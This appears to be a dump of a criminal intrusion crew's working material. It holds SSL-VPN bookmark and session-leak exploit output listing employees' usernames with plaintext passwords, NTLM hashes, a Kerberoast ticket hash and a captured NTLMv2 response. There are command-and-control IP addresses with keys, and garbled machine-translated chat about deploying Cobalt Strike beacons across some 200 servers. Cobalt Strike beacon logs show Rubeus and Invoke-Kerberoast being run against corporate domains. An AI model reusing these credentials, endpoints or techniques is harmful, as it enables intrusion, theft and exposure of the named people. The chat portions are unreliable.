{'userGroupID': 24, 'name': 'Sales Department Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\Groups\\\\\Sales\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 43, 'name': 'Denise'PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.184'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install DAKCS Beyond', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/BeyondSetup.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install Artiva', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/Artiva.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 241, 'name': 'Connect to Office PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.56'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Beyond', 'username': 'root', 'password': 'D@kc$1', 'service': 'SSH', 'host': '10.10.10.220'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Backups', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\e$\\DAKCSBK\dakcs\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Install Files', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\App Shares\\\DAKCS\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'GW File Share', 'username': 'stanleyford', 'password': '8826040aA!', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.12\transfer\\\MalibuGroup\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'RDP to Local PC', 'username': 'jilagan', 'password': 'Gr@nt2019', 'service': 'RDP', 'host': '10.10.11.34'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 267, 'name': 'Connect to PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.6'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'vincent.velardi', 'password': 'Grant1993**', 'service': 'RDP', 'host': '10.10.10.237'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'loraine.molina', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.226'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 271, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.228'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 273, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.146'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pedro.campos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.104'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 280, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.10'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 275, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.16'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 276, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.33'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 281, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.100'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 277, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.67'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 279, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.116'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 278, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.139'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 194, 'name': 'Download Streams Phone App', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'www.dropbox.com/s/bh40vtpu0w14zr9/Streams_Setup.exe?dl=0'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 282, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.119'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'octavia.mcclendon', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Sharon.Poole', 'password': 'Sharon2020@', 'service': 'RDP', 'host': '10.10.11.210'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Aguilar', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.65'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'oasey.covello', 'password': 'Grant2021', 'service': 'RDP', 'host': '10.10.10.74'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.22'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'arielle.leigh', 'password': 'leseid0818', 'service': 'RDP', 'host': '10.40.10.29'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 290, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kyle.shorten', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.80'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'tony.aguayo', 'password': 'Covid2020', 'service': 'RDP', 'host': '10.10.11.107'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Daniel.Cha', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.145'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 297, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.27'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'josey.barrera', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.189'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pilar.zuniga', 'password': 'basiaZ1929', 'service': 'RDP', 'host': '10.10.10.147'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 299, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.71'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Olivia.Sands', 'password': 'Love1978

, 'service': 'RDP', 'host': '10.40.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to Remote Access pc', 'username': 'Olivia.Sands', 'password': 'Love1978

 , 'service': 'RDP', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Jeff.Moeller', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.105'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 303, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.123'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.garcia', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.209'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Frances.Guerrero', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.208'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.vasquez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.207'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joseph.monette', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.106'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'belen.castillo', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.19'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'steve.price', 'password': 'Grantweber2020', 'service': 'RDP', 'host': '10.10.11.222'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 310, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.99'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 311, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'michael.longres', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.18'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joshua.widawski', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.39'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'eric.holmes', 'password': 'Grant2019', 'service': 'RDP', 'host': '10.10.10.112'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joanna.gallegos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.82'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'april.vance', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.63'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Melik.Poghosyan', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.250'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Janiece.Knott', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.32'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 319, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'lionel.garcia', 'password': 'GrantWeber2020', 'service': 'RDP', 'host': '10.10.11.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Bernardo.soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.100'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'jake.ortiz', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.84'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 233, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.35'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 324, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.110'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 322, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.165'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Temp PC', 'username': 'luis.fernandez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.153'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 335, 'name': 'Accurint', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'secure.accurint.com/app/bps/main'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Ambry Folder', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\\FD3\\\Ambry'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'nia.johnson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.138'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'lori.thompson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.148'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 213, 'name': 'Connect to my pc...', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.186'}
?till 12plus minusga all 3 in the shit? they're already pretty used by TV - but okay)) yeah, right))) there are three more from friday like you at 0? do you have coba? take it?
[+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 00KnsFUYwElND7n9AuOv0gXkEMbDbJNZdIGsGhuxVlA= userType: 1 userName: fmancuso Password: kilroyFRM321# Domain: CANALBARGE
      [+] Found: SessionID: 1aH0W0vgfKKUorMuzi0O91xtWTq01SJkw55W0d0X3UtY= userType: 1 userName: lcall Password: lc020109123//? Domain: CANALBARGE
      [+] Found: SessionID: 2HEgBXoesL1OZFmh8HwZevBxOKP07mEzHL0BJyBZ7mk= userType: 1 userName: challman Password: CHvita93! Domain: CANALBARGE
      [+] Found: SessionID: 7YA1Bbya5MRWbmtI7jQDTuCFpNr3TP0z7IZx21i7HXk= userType: 1 userName: gcalvillo Password: Lali022315 Domain: CANALBARGE
      [+] Found: SessionID: 81QtVcg20XnqLBycgw0H709ZpGKXKyFxRfv3gNFwB0M= userType: 1 userName: jturner Password: Pe@ches_!!# Domain: CANALBARGE
      [+] Found: SessionID: ALZ3k7QjO81pgnMp1YtD08SHOZE8QVDW90O9VORUvkM= userType: 1 userName: tknight Password: CBCdispatch97 Domain: CANALBARGE
      [+] Found: SessionID: GXK01m2Etj8y21LW3cYF0MpcyqxgEhKq21QvKkPx34E= userType: 1 userName: dhysaw Password: Vinger110106 Domain: CANALBARGE
      [+] Found: SessionID: HOlgsgsrlafclFRwWLx1eIg2eYApSN3pGIcbizsJXFg= userType: 1 userName: mcampbel Password: Wrc1129** Domain: CANALBARGE
      [+] Found: SessionID: NTkdkB29z1ZQ08GTBZ4zMfUnoHeC8PIqs9MQ5khx4Co= userType: 1 userName: bbarrere Password: @BnBe19310918CB2 Domain: CANALBARGE
      [+] Found: SessionID: Q072oyaSMM6DTm1Z63Rv4mFIZCy7SbSf1zsxUlCgplM= userType: 1 userName: kcamp Password: KC2020cbc Domain: CANALBARGE
      [+] Found: SessionID: QAhh9tF6cM3n5ifnj8vQBZ67JWzbZl2GT8EHJhhuF7Y= userType: 1 userName: ccatalan Password: CC6013cbc1986 Domain: CANALBARGE
      [+] Found: SessionID: QwRMW03QsuEUsKGpfNIraSL1YDXVaxgv28n0U5e18Q8= userType: 1 userName: sespinoza Password: 0306!Jessica Domain: CANALBARGE
      [+] Found: SessionID: Rx0VXlABY6z7akQcpBgjA9l7CF11QWT1Cm5tvvvBr98= userType: 1 userName: tkish Password: TJball44!!! Domain: CANALBARGE
      [+] Found: SessionID: S14OBRRWdwgNN18yL6W6WClFDN0Wu1ZKGKeuG9I0pR4CA= userType: 1 userName: ttoups Password: TOTcbc1987 Domain: CANALBARGE
      [+] Found: SessionID: a8cbVmuMbdiLvi1vihNYw3a8ccWoAq6QCxzCYEDeAxiMo= userType: 1 userName: rblanchard Password: Scottieb72985* Domain: CANALBARGE
      [+] Found: SessionID: fwgzABLIR1cfsBeDPA3CbAPQYKfK4f6RS9H2Qmq6x4U= userType: 1 userName: bwondolowski Password: Traffic2262 Domain: CANALBARGE
      [+] Found: SessionID: klh5xtYgFH7mynHLcz3c0Ah2H4rtdLUGkCyngUsrPeQ= userType: 1 userName: jreyes Password: God&faith* Domain: CANALBARGE
      [+] Found: SessionID: o3I1l3SxuvwPhyNxdf9kUDAIUjHNJJqGfzTbuG3TQxY= userType: 1 userName: slohja Password: Uwo16Uit Domain: CANALBARGE
      [+] Found: SessionID: t3fe0eWXhK7po1NFPp91aHk0oWLkaxMiRkdjxgwiA4E= userType: 1 userName: tmerrick Password: SAdie*$)pup5geaux Domain: CANALBARGE
      [+] Found: SessionID: tsrxhNflmtcBJ5WYaJEiLQubk9YjWrauMksnaOrW1UU= userType: 1 userName: jmaynard Password: Jm120113!!3 Domain: CANALBARGE
      [+] Found: SessionID: ylrGw1eBBh1ocAYKzymIB2oKDGSHvpuv3FQzgwL0WCQ= userType: 1 userName: bhulin Password: Joseph1959!@ Domain: CANALBARGE
      [+] Found: SessionID: z2zpQ7tyFfBQdFnQr7ICr7igVCx08u1qAjbTuORdFvQug= userType: 1 userName: jballard Password: JB$Williesmuckers1 Domain: CANALBARGE
``@tl1
today until what time? @user4 sayspngcpower failedpngcpower nothing to work with so you have nothing to work with? or is tv poking around? new sessions will be @tl1iandreevsnikitenkostalinottl2tl1admin
====== NetworkShares ======

  Name : ADMIN$
  Path : C:\windows
  Description : Remote Admin

  Name : C$
  Path : C:\
  Description : Default share

  Name : IPC$
  Path :
  Description : Remote IPC
``````
Domain : UKHECSLT3028
Login : Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad


Domain: MATCHES
Login: mercedesd
Password: Dinham2323
NTLM: 7c839aa54221edb65e959f18ab9bde41
We set up a timeserver, we will try to pierce through it and mark from your packs what got attracted that not on 100 in 2 and 3 77da we split uzhetudah draw the remaining 77@user7 in my opinion skidyvalem 3 kobut to servers moremozhet randl leave in the attracted immediately into the system to jump or yet do not care?hz, why did we make them? so why piip if the normal one opens? piip opened with a dll that you were given?[ ](https://mediaeveryone.com/group/sisd-net?msg=R4tMQGHYvnssSuG9x) opened?
*** initial beacon from tylerservice *@10.0.61.53 (SHAREP-WEB1)
``I wrote above:confused:`` +catchy comment?
tuta ya
``what the fuck is this first 100 fly to 185...113 to 100 servers second 100 to 199....166 without, where not attracted then C`10.0.61.53`` with pip? give the server for example which is not attracted is 300 scoreenu +- so it is not 200[ ](https://mediaeveryone.com/group/sisd-net?msg=FtspLCj7tFXPjyJcG) yes[ ](https://mediaeveryone.com/group/sisd-net?msg=toFSPaHALgWPyXEXf) there was only one needed then. the rest just did not close277 servers?why not vinlogon?) hz, so it happened) in kobegde? rundll32[ ](https://mediaeveryone.com/group/sisd-net?msg=4pksjc5vdTQ2erqs4) ? a question, why so many rund processes? and also let's draw what is drawnadmin.sisd.k12 and here we have a basis of 200 servers? no with 15 is sisd.k12 they are at user7 so this domain with 15 pc? I have all sessions only on admin.sisd.k12 it does not on another domain sessionset domain )))) is it? 976what is the session in the main domain? the other 2 where it is allowed to go then change the kobeThen all the kobe is not available? I have only succeeded in my login is there any new kobe? not one to connect,[ ](https://mediaeveryone.com/group/sisd-net?msg=gHYQNgtYGuPndk7PR) no net pings to the ipe koba? we have some shit with the network has not helped try to reboot the pc just in case most likely it's the connection I work with sessions last does not change I now in neikoba itself hangs still not let?[ ](https://mediaeveryone.com/group/sisd-net?msg=pzgWKwEyNwwW8T5KZ) can not rejoin, and the guys can not go either[ ](https://mediaeveryone.com/group/sisd-net?msg=YMxeLKtveT2dsfXcq) qwqe rejoin my koba hangs give me a list of cleared admins kreidenschmuck@user4vmic also does not work?i'll take it into account1 nickname on all kobas also do not roll without repetitiontranscripts and stuffnicky russian characterswhat else does not roll? transcript also do not rollHe is your idol? why?[ ](https://mediaeveryone.com/group/sisd-net?msg=MEFpGyiJ6z8H6TWLH) 3796 and lukashenko also do not rollaKiric? do i really need to explain?
12/08 17:50:20 *** Lukashenko has joined.
?What bikon is it?"(https://mediaeveryone.com/group/sisd-net?msg=eZYv8k3EgTytn8jum) @tl1 are you talking about? ?What bikon?
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
```
moyanet``.
199.127.61.166:62452
VHF2006g5jTldA0KSp9N8y3zkvmxLuSq4bS
``is it deleted?``check it out.`` x64 hopefully?``my coba``
185.150.190.113:61718
O5xFflqqDG7LDQJUDbdtkj54zQ8QDVMMI0W
``Figured it out. windows executeble(s) and how did you get it if you can not see? in payload generator do not see this listner and throw here access to the two cobbs in which we will worksome silkode on this bindpipe and here bindpipe see? now check the current dlldll start and delete it. or it's averts tear - I don't know. but the session does not come, traffic, even chet? about the not attracted found out why? since you have not found the admin will have to) and you asked why attract them)) I told you, very few people are attracted...when you pull all 200 servers, according to the classics migrate to the system process give access to the other colleagues in these kobytoy in 2 kobytoy spread po 100 on kobuna all 200 servers throw sessions in the kobyu we have 200 servers and 4000 Armory do the following, since we have not found the admin YDR everything will have to do by handBuild will be 3 files: exe, dllx64,dllx86okay then move on+++++da like done done not finished yet?on the spot now reboot the machine hangs + wait until everything is done nothing will explode) menu will pop up
until you zabmitmitmit its contents it is there) press nothing will explode? dllinject item not visible in the menu the more you leave time for a briefing the more counter questions will be answered and then you yourself will do everything will explain strategy to close not delayedok+I do not need to clean up and download 2?3/5fdsitgjeieyda, tok I did not skidkode, now@all write down who is here? ah, then all of you now install in the coba and all the use kizakimog do it in the general? you have done - write down what you have done - I give you the task as above work in this format, put in the coba new cna files ``
SFHU*G&674wEsfI&^WR
``user3user94273 how many user pc's do we have? it's on dk in admin.sisd.k1211:20 AMSnap the time here on the server and send it here+it's the contents of the file, actually```

TicketByteHexStream :
Hash : $krb5tgs$23$*certsrv$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*
                       $EA1A5A8531047E7E4B2B3BED9C3EFDBB$FA7FFB7C5BF13A60E23B1F72C9AFB9BCC7B4D914D3
                       F6EC906CF1FAF970B4741D0C83B3F3300FB0091248E4C92A6E2FAA974C347F5B2030166A0704
                       90332F19948AE385CEDBE52C70513BBE70E9140D9261367EE80B8538F41F313C8D776D5B0EA4
                       A397B3F19F3F67DE34ECA5083D5F7AC3FB2B62A316AC2D2E1C642D027AED0E931C435445C206
                       5CBC0AACEF3659A640DE0F580834753BAA571D93E7F4A86A046AE3DFD7E0E1392329EB689BB2
                       064261D86233A4E716BB41D746EB1FF9F05DE511CFB2C22B26C37C19238355A9628D14666877
                       377E2EED81032D4C7C852668326027C6CEA4EB71A5DBDFB8B9C66750D9890199A06EC0634D27
                       20084D97C2C040B7A4B1C936C0655AE246B4C172D21852B0BE49041C23A71001AC5518616B84
                       22A7E8276740673CD3B16F7BE8B91441787E6443E13E80BF306F830FEBABE6BF7AFDD894375C
                       850334AAD937DAD89E8F235C0CD2F484431545643456640DE52572B858297A368E166FBCA676
                       C338548666571DBEFA0943C315B5D6A6BD0999CF74E5379E1BB3A1C9ACD9FE030B17EC14E3EB
                       0AEFB88C648B733EE00573C99ABEF2D9FB873757B8933C3D83B9EEFA2AFCFD71602C98014085
                       D9A1AE913818C73CC71358AD2703EA144DA00D82F04BE01FF9E9F29CAC4BB71A599FE81944E2
                       20108C58E7074F9AA8EB38C6F9316DC705F58FF0257106F56E294CF10629D42EF7C2452A3DAE
                       15773D9551B88F737BB5BAAB0A22ABE897FA6028D19EB456B3CCBC9581DB9D5CCE17AC751BCD
                       EE04F61B6C6A71F0C7F29CD2F53898BFE6EA175AC16000BC83A044B14B15F9E8BCAC708B7437
                       4B3DDC020EBD95548986FD1205CAE0F2C1F682EBE126E8222DD9D86A203E700467B63839603A
                       72171BEB96478FC4DCB083D6759EA0FC6E73F5CCC81883EE76154B05BC44EC70A74459A1352A
                       5E868CDCA100A43A1259D8085603C9AE56447210E3FEE5B705F2093E4AB14476778F105D64EF
                       AF331A203D1353C510CAEA32722D1DC8F9A89AAA922199E10FC8DB8B3D9E8A6D3BC3CAC22295
                       3AEBAC87FEA94067A09EF7D815C026DD88E1BF031E00AC631AC832B10C148074A177442BB5C7
                       FA0564B4164315BB7CCE92841915E0C19760AB662EDCAD23F6142D07ED2C0B6CCB5D30196335
                       E5ED37A8659E43521FF52C2A765751A8ABFD4FE70334FE5F64D31EA3B79A34AF1BEACAACC175
                       27304CBC0FDCA29E505D3717B8EA2EF6FC6ADAC01503481A13DAE6A71837588D1295C33A1C56
                       6AC241BF2AFE0865E9E863AAF5BA4AA312E8378442EB271DF0E34B47851D4A571040889C4397
                       C828484498C247770F5D777768A2A3519B42580AD7CDAB2418FC88E7AF0CD4178AD4F99B25C9
                       A54D065239C3A6FFF4D9854CFC7CCF4D8E31F1BA7B679FCB96CCC468668A7EA12A3D4529D264
                       75A8D068FF256C14BA239B940291542D88D5CF07B05978B05CB5C5BBDC2185CDF70FC32B9E0F
                       547D18F935B4ABADE17CBAF463534133925AF2F197B480B8CFDBFDD0C45803F3AD205398DBB7
                       019BA56E0F33039B7CA53B779676CF08A38891B6F992290517AFAD7DD3E4EB0D50ABEBDDE16E
                       AC67076270ED675975ACBCDD
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com


````Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 `translate into a file with hash formatactually it seems to be the one that you have already given us in the slide.com/EmpireProject/Empire/blob/mob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 give me a link to the invoke kerb with which you shoot the OS
[+] received output:
2020-09-24T00:20:44 - HTTP request for / received from 10.59.0.243

2020-09-24T00:20:44 - HTTP NTLMv2 challenge/response captured from 10.59.0.243 (RAJA-9298):
raja-9298::ZOHOCORP:B3BD81E12761C973:76647C5C0CB37CE1C766147E15568B0B:010100000000000088FC2E71DA91D6018A6E4CF93DBF74F500000000020006004C00410042000100100048004F00530054004E0041004D004500040012006C00610062002E006C006F00630061006C000300240068006F00730074006E0061006D0065002E006C00610062002E006C006F00630061006C00050012006C00610062002E006C006F00630061006C000700080088FC2E71DA91D60106000400020000000800300030000000000000000100000000200000A2CCD58658F72E5537FD61255FEA70627E2DCFE35C6D4C095F02C99AC2A92AD80A001000000000000000000000000000000000000900440048005400540050002F00720061006A0061002D0039003200390038002E006300730065007A002E007A006F0068006F0063006F007200700069006E002E0063006F006D000000000000000000
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:ru.zohocorpin.com
[+] host called home, sent: 318067 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : ru.zohocorpin.com

[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=en,DC=zohocorpin,DC=com' for AS-REP roastable users

[+] received output:

[X] Error executing the domain searcher: A referral was returned from the server.

``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[+] host called home, sent: 318069 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : tsi.zohocorpin.com

[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=tsi,DC=zohocorpin,DC=com' for AS-REP roastable users

[+] received output:
[X] No users found to AS-REP roast!

``````
beacon> execute-assembly Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[+] host called home, sent: 320115 bytes
```
it's been like this for about 5 minutes, nothing, I think I'll try again with rubeus?
beacon> psinject 24992 x86 invoke-kerberoast -domain ru.zohocorpin.com | fl
[*] Tasked beacon to psinject: invoke-kerberoast -domain ru.zohocorpin.com | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
ERROR: "
ERROR: At line:990 char:20
ERROR: + else { $Results = $UserSearcher.FindAll() }
